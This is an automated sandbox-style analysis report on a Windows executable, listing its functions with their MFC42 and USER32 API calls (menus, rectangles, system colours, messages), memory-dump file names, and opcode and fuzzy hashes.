Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1099lstrlen
String ID:
API String ID: 1928622403-0
Opcode ID: 4bee647f69ad603efc3166ba525d039519d78af2bd8e619416e6206c4d70769b
Instruction ID: 340161a27acc3d8fbd15cc7f2a3f47fe8300a58bbd696ad4711903d47e2d7cac
Opcode Fuzzy Hash: 4bee647f69ad603efc3166ba525d039519d78af2bd8e619416e6206c4d70769b
Instruction Fuzzy Hash: F1017172A10118FBCF10AFA6DC428DFBB6DEF41294741842AF901D7210D674DA50CAE4

Uniqueness

Uniqueness Score: -1.00%

Function 004019D8, Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00422FEC
#540.MFC42 ref: 00422FFF
#540.MFC42 ref: 0042300B

Part of subcall function 004010D7: #823.MFC42(0000000C), ref: 00425215

#860.MFC42(?), ref: 00423051

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #540$#823#860H_prolog
String ID:
API String ID: 1097097815-0
Opcode ID: aad585e004fa5fc855552da6883a8051a8135009292e7a895a0f93091faf2417
Instruction ID: fdf8f97f4c5e33f7f17aef2f565b77a833713ed0a63ab87bed624d2ed89ef3c4
Opcode Fuzzy Hash: aad585e004fa5fc855552da6883a8051a8135009292e7a895a0f93091faf2417
Instruction Fuzzy Hash: 88115BB1A007559FCB10DF69D54179ABBF0FF48318F40852EE85A97742C7B8AA08CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00421963, Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

CopyRect.USER32 ref: 00421974
#2124.MFC42(00000000,?,?,?,?,?,?), ref: 00421998
#4083.MFC42(00000000,?,?,?,?,?,?), ref: 004219A9
#4287.MFC42(00000200,00000000,00000020,00000000,?,?,?,?,?,?), ref: 004219BD

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2124#4083#4287CopyRect
String ID:
API String ID: 902454083-0
Opcode ID: 4e648a07d430e7fbdacad952039d24033be1da2a0d703199daaec52dd3a995ea
Instruction ID: c70710429d0a57d93fe6583fc10224b13bd70d160967b0659cb28f88e991ef0d
Opcode Fuzzy Hash: 4e648a07d430e7fbdacad952039d24033be1da2a0d703199daaec52dd3a995ea
Instruction Fuzzy Hash: C201B575300229ABDF106F559C4AFAF3BAAEF88720F140116FD21972D1DB74E811CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004014E2, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040D6BE
#800.MFC42(?), ref: 0040D74F

Part of subcall function 004010CD: _EH_prolog.MSVCRT ref: 0040E25A
Part of subcall function 004010CD: #324.MFC42(00000088,?), ref: 0040E26F
Part of subcall function 004010CD: #567.MFC42(00000088,?), ref: 0040E27D
Part of subcall function 004010CD: #540.MFC42(00000088,?), ref: 0040E294
Part of subcall function 004010CD: #860.MFC42(00442178,00000088,?), ref: 0040E2AA

#2514.MFC42(?), ref: 0040D6FF
#535.MFC42(?,?,?,?,?), ref: 0040D729

Part of subcall function 00401055: _EH_prolog.MSVCRT ref: 0040D650
Part of subcall function 00401055: #535.MFC42(?), ref: 0040D66B
Part of subcall function 00401055: #535.MFC42(?,?,?), ref: 0040D67E
Part of subcall function 00401055: #800.MFC42(?,?,?), ref: 0040D699
Part of subcall function 00401055: #800.MFC42(?,?,?), ref: 0040D6A5

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #535#800H_prolog$#2514#324#540#567#860
String ID:
API String ID: 2883411993-0
Opcode ID: a714feef5f15b4dbc0e4c69aa31332e488001345331a28b91f9b80bfc68ec9ce
Instruction ID: 6261ff74c0be57b3064648453a0a6da14e5df5efb8328a418da3309125baa662
Opcode Fuzzy Hash: a714feef5f15b4dbc0e4c69aa31332e488001345331a28b91f9b80bfc68ec9ce
Instruction Fuzzy Hash: 6A117371D10268DBDB15EBA5C946BEDB7B4AF14304F1041AFE016732D2CBB85B48CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0040198D, Relevance: 6.0, APIs: 4, Instructions: 46windowCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041545D
#823.MFC42(00000024), ref: 0041546C
ModifyMenuA.USER32(000000FF,?,000000FF,?,00000000), ref: 004154B3
#800.MFC42 ref: 004154C0

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800#823H_prologMenuModify
String ID:
API String ID: 15654151-0
Opcode ID: 6e11d29987dbac4c416b2cfc31be7b070a65240054c60d0d9c9ffa850d2aa23b
Instruction ID: 56c001fb87ea94bfaaf7416dfcbb1034bed6ffb32a98c4c10a77d26a06232bc7
Opcode Fuzzy Hash: 6e11d29987dbac4c416b2cfc31be7b070a65240054c60d0d9c9ffa850d2aa23b
Instruction Fuzzy Hash: 9501D635600A15EFDB24DF64D906BDEB761EF40365F10862FA826A36E0C7789D41C758

Uniqueness

Uniqueness Score: -1.00%

Function 00422C58, Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 00422C68
GetSysColor.USER32(0000000F), ref: 00422C94
GetSysColor.USER32(0000000F), ref: 00422CB5
#2754.MFC42(?,00000000), ref: 00422CC3

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$#2754ClientRect
String ID:
API String ID: 416825036-0
Opcode ID: 725425853954bcf2e9a8492cac91d0f9ef47a1cb5ff3999c523df39c66add12d
Instruction ID: b0cc96cdb90d23408b164e61430273beaa44f6bc4d2aff6ba2df3480d432d299
Opcode Fuzzy Hash: 725425853954bcf2e9a8492cac91d0f9ef47a1cb5ff3999c523df39c66add12d
Instruction Fuzzy Hash: 5E01DE75D10218AFDB10DFA4D945AEEBBF4BB08310F40456AE905F7340D7746944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401460, Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040B53A
#858.MFC42(?), ref: 0040B568
#858.MFC42(?,?), ref: 0040B57A
#800.MFC42(?,?,?), ref: 0040B5A4

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #858$#800H_prolog
String ID:
API String ID: 765423493-0
Opcode ID: da07c192afc43defc0ba66ddbc36dd1fc4b4ffc3594cd150a655762dc371292a
Instruction ID: 167b8843d25f126e2729e943e2a3846d4b7e884193f788c34901c6014efe7423
Opcode Fuzzy Hash: da07c192afc43defc0ba66ddbc36dd1fc4b4ffc3594cd150a655762dc371292a
Instruction Fuzzy Hash: 8901C431901158EFCB00EF95D145ADDBBF8EF14318F50415EE005B3281DB785B08CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041854D, Relevance: 6.0, APIs: 4, Instructions: 42windowCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00418552
#823.MFC42(00000054), ref: 0041855E
CreatePopupMenu.USER32 ref: 00418596
#1644.MFC42(00000000), ref: 0041859F

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1644#823CreateH_prologMenuPopup
String ID:
API String ID: 1494437324-0
Opcode ID: 74995cac1a29df34129f4cac365a9a14bff695062e554b243be6ca46768613c3
Instruction ID: 1e82190181eb29da45d886b5918d24cf7fdfd179e228ca7710e1a12ac8e0d460
Opcode Fuzzy Hash: 74995cac1a29df34129f4cac365a9a14bff695062e554b243be6ca46768613c3
Instruction Fuzzy Hash: 0D017171B00624AFC724DF59D90565EBAF1FB48724F50462FB155D3BC0CBB5A940CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00412676, Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041267B
#500.MFC42 ref: 0041269C
#500.MFC42 ref: 004126B0
GetCPInfo.KERNEL32(00000000,004421D0), ref: 004126E5

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #500$H_prologInfo
String ID:
API String ID: 59146550-0
Opcode ID: 46830574a98dcd9293a4541b0d8498e0fa689a163bd285a33849df2c9d508c5a
Instruction ID: 172b76ca5c7f68926e987b07f6f9c25b0e76ea78a6d96e944574e0c08f8a741a
Opcode Fuzzy Hash: 46830574a98dcd9293a4541b0d8498e0fa689a163bd285a33849df2c9d508c5a
Instruction Fuzzy Hash: 340109B1A00B21DFC7249F1AA98024AFBF4FF917587509A1FE49283AA1C7F8A544CB14

Uniqueness

Uniqueness Score: -1.00%

Function 004011E0, Relevance: 6.0, APIs: 4, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0040EFB0
#2864.MFC42(00000000), ref: 0040EFB7
IsChild.USER32(?,?), ref: 0040EFD1
SendMessageA.USER32 ref: 0040EFF9

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2864ChildFocusMessageSend
String ID:
API String ID: 4174092889-0
Opcode ID: 7df797e7b2dd4f75ad52cd57a5df0426c777171adbd4fba5656717dd07527628
Instruction ID: 22cdc8c831ad99d11bad130c00ba65dbd51889d543869d1d24dffdbdb0775b81
Opcode Fuzzy Hash: 7df797e7b2dd4f75ad52cd57a5df0426c777171adbd4fba5656717dd07527628
Instruction Fuzzy Hash: A9013C31304212BFE7219B269C09F6B76A8BF48740F144D3AB586E62E4EBB5E8119658

Uniqueness

Uniqueness Score: -1.00%

Function 0041E60E, Relevance: 6.0, APIs: 4, Instructions: 40COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041E613
#540.MFC42 ref: 0041E623
#540.MFC42 ref: 0041E630
SetRect.USER32 ref: 0041E665

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #540$H_prologRect
String ID:
API String ID: 4121290371-0
Opcode ID: 8496e038da5ed10fdd4dd51dbc6483bdf727b728101d3c313a105933b9db2de3
Instruction ID: 83dcbb803d5d9c3e3a3ccbd7d1f07e2c835fc92610e342f4f29c75e5655d86d2
Opcode Fuzzy Hash: 8496e038da5ed10fdd4dd51dbc6483bdf727b728101d3c313a105933b9db2de3
Instruction Fuzzy Hash: A10190B5A10B209FC3309F1AE94195AFBF8FFA56107404A1FA496D2A20D7B4A604CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00401E15, Relevance: 6.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004257E6
??0_Lockit@std@@QAE@XZ.MSVCP60 ref: 004257F4
#825.MFC42(?,?), ref: 00425818
??1_Lockit@std@@QAE@XZ.MSVCP60 ref: 0042582F

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Lockit@std@@$#825??0_??1_H_prolog
String ID:
API String ID: 1282909303-0
Opcode ID: 6c30e04c0c6d10808a98d5a899c903c9823ed05c35c0cc4aebd36368104a8266
Instruction ID: 8094fd2ef66484f94808668d564548399dad85c56e9e64d74ea9450436df6759
Opcode Fuzzy Hash: 6c30e04c0c6d10808a98d5a899c903c9823ed05c35c0cc4aebd36368104a8266
Instruction Fuzzy Hash: 72F0C276A00620DBCB24AF55E8456AEB770FB85335F91413FF826B3290CB786D00CA58

Uniqueness

Uniqueness Score: -1.00%

Function 00401FE6, Relevance: 6.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

#603.MFC42 ref: 0040B6EB
#825.MFC42(?), ref: 0040B6F1
#603.MFC42(?,?,?,?,?), ref: 0040B704
#825.MFC42(?), ref: 0040B70A

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #603#825
String ID:
API String ID: 414174181-0
Opcode ID: 064094015b17d50737094913f7c061a88d2be030ca6ffc69bbaba3ee3c2d7bfc
Instruction ID: 4df41afb1b0ebaefa2373f75f9612135587150b90ac338778bfeeb780c1e46ea
Opcode Fuzzy Hash: 064094015b17d50737094913f7c061a88d2be030ca6ffc69bbaba3ee3c2d7bfc
Instruction Fuzzy Hash: 6CF096313006104FC7259F29E08573EB3B2AFD4725F55451EE04657782CB79EC068ADD

Uniqueness

Uniqueness Score: -1.00%

Function 00401B9F, Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00420F9E
#567.MFC42 ref: 00420FAA
#540.MFC42 ref: 00420FC2

Part of subcall function 0040151E: #341.MFC42 ref: 0041C133

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00420FE3

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #341#540#567H_prologInfoParametersSystem
String ID:
API String ID: 2377698698-0
Opcode ID: a67d04cb677553de0c9820746651949aa2fbcc48ec7467a785983e17a571bfc0
Instruction ID: 0dbc4c6b8ab8229d3c7d9368ae27407e33dbe300bdb412add12eabba8b55e71f
Opcode Fuzzy Hash: a67d04cb677553de0c9820746651949aa2fbcc48ec7467a785983e17a571bfc0
Instruction Fuzzy Hash: 8801AD71600B14DFE721DF64D505B9AB7E4FB00308F50492EE4929B781CBF8A608CB88

Uniqueness

Uniqueness Score: -1.00%

Function 0040207C, Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040D590
#535.MFC42(?,?,?), ref: 0040D5A9

Part of subcall function 00401726: _EH_prolog.MSVCRT ref: 0040AAE4
Part of subcall function 00401726: SendMessageA.USER32 ref: 0040AB18
Part of subcall function 00401726: #2915.MFC42(?), ref: 0040AB40
Part of subcall function 00401726: #5572.MFC42(000000FF,?), ref: 0040AB56
Part of subcall function 00401726: SendMessageA.USER32 ref: 0040AB6C
Part of subcall function 00401726: #800.MFC42 ref: 0040AB76

#535.MFC42(?,?,?), ref: 0040D5C3
#800.MFC42(00000001,?,?,?), ref: 0040D5D8

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
